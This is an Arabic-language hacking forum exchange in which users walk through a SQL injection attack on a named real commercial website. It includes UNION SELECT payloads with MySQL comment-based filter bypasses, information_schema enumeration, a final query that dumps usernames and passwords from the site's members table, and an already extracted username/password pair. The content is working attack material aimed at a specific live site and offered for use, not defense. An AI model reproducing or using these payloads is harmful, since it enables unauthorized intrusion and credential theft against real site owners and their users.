 | اقتباس |  | | |  |  المشاركة الأصلية كتبت بواسطة إسلام العالم |  | | | | | | | | | إليكم وين صلت
أول الشي الموقع عليه حماية على أمر العواميد تم التخطي هكذا
بعدين في حماية على @@version تخطينا هكذا
الموقع عليه حماية على امر concat يا شباب تم التخطيب هكدا
إسم الجدول : members
إسم عامود الباس : pass_word
إسم عامود اليوزر : public
باس :7684
اليوزر : 4
لا أعرف إذا الشغل صحيح أم لا | |  | |  | |
هلا اخي
تخطي مشكل معرفة الاصدار
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5
/*!CONCAT
الموقع مانع كلمة concat
والتخطي ب
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
على فكرة الموقع مانع الامر group_ الاستعلام بlimit
فيه جدول واحد فقط
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
جدول اليوزر
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
الحقنة كاملة
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
وللبحث عن شيخ القبيلة استعمل limit